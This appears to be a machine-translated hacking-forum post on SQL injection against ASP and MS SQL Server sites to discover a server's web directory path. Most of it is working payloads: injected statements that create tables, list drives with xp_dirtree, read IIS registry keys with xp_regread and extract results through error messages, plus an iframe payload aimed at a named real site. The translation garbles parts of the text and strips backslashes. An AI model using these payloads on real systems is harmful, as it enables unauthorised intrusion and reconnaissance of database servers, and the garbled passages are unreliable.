SQL Injection Path Problems

Nothing in the afternoon
I looked at angel and wrote a path. I found a zombie and tried it for a long time.
I am exhausted.
I found that
Microsoft ole db Provider for SQL Server Error 80040e07

A syntax error occurs when you convert varchar value # export dobjects to a column whose data type is int.

/Html/showdetail_new.asp, row 9
In this way, his method cannot be used.
# Must be blocked
It is even harder to get the path for meals.
Let's take a look at one of them ~
<IFRAME marginWidth = 0 marginHeight = 0
Src = "http://music.ty.sx.cn/html/showdetail_new.asp? Id = 214302; declare @ result varchar (255) exec master. dbo. xp_regread HKEY_LOCAL_MACHINE, SYSTEMControlSet001ServicesW3svcParametersvirtula Roots,/, @ result output insert into cyfd (gyfd) values (@ result );--"
FrameBorder = 0 width = 500 scrolling = noshade
Height = 400> </IFRAME>
I'm dizzy.
The chance of the angel method to manually guess and manage the background path is very low. We need to use XP_DIRTREE to obtain the information we want. The following method may be simpler! The
It may be used by many friends once published, but it is absolutely good! We will write the path to the table!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; create table dirs (paths varchar (100), id int )--
Return: normal information! The table is successfully created! Continue!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1; insert dirs exec master. dbo. xp_dirtree c :--
Return: normal information. It indicates that all the directories on drive C are successfully written! Great! The next step is to retrieve the table! Let it go.
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs )-
Return: Microsoft ole db Provider for SQL Server Error 80040e07
A syntax error occurs when you convert varchar value @ Inetpub to a column whose data type is int.
The directory name in the table is displayed in sequence!
Statement: http: // http://www.xxxxx.com/down/list.asp? Id = 1 and 0 <> (select top 1 paths from dirs where paths not in (@ Inetpub ))--
Finally, use the same method to test and get the webpage directory under E: WEB.
I want to write it!
1. How to obtain the absolute Web path?
Haha? It took me a long time to study this problem. As we all know, many MS items are stored in the registry. Can we register the Web location? Br/> How can I gather Jian Hui Meng? Br/> HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesW3SVCParametersVirtual Roots
We can use the extended stored procedure xp_regread to obtain its value.
EXEC master. dbo. xp_regread HKEY_LOCAL_MACHINE,
SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots ,/
In this way, the problem is solved, and the result is retrieved. How can we return its value in IE? My method is: first create a temporary
Table, which contains a field of the char 255 type. Use it to save the absolute Web path value. After the table is created, we use the method of reading the Registry to save the returned value in a variable.
Add a record (the value of the variable) to the new table ). In this way, the path is written to the table. Submit:
DECLARE @ result varchar (255) EXEC master. dbo. xp_regread HKEY_LOCAL_MACHINE,
SYSTEMControlSet001ServicesW3SVCParametersVirtual Roots,/, @ result output insert into temporary table (temporary field name) values (@ result );--
Then, we will submit: 1 = (select count (*) from temporary table where temporary field Name> 1)
In this way, IE reports an error and returns the value of the Web path just inserted. I have also tried to directly use the variable to report an error and asked IE to return the value of the variable. The result is a loss.
Failed, so I thought of creating a temporary table and adding data to it! Finally, we will delete the created temporary table.
Do not destroy hosts in China ~ Lis0 reminder here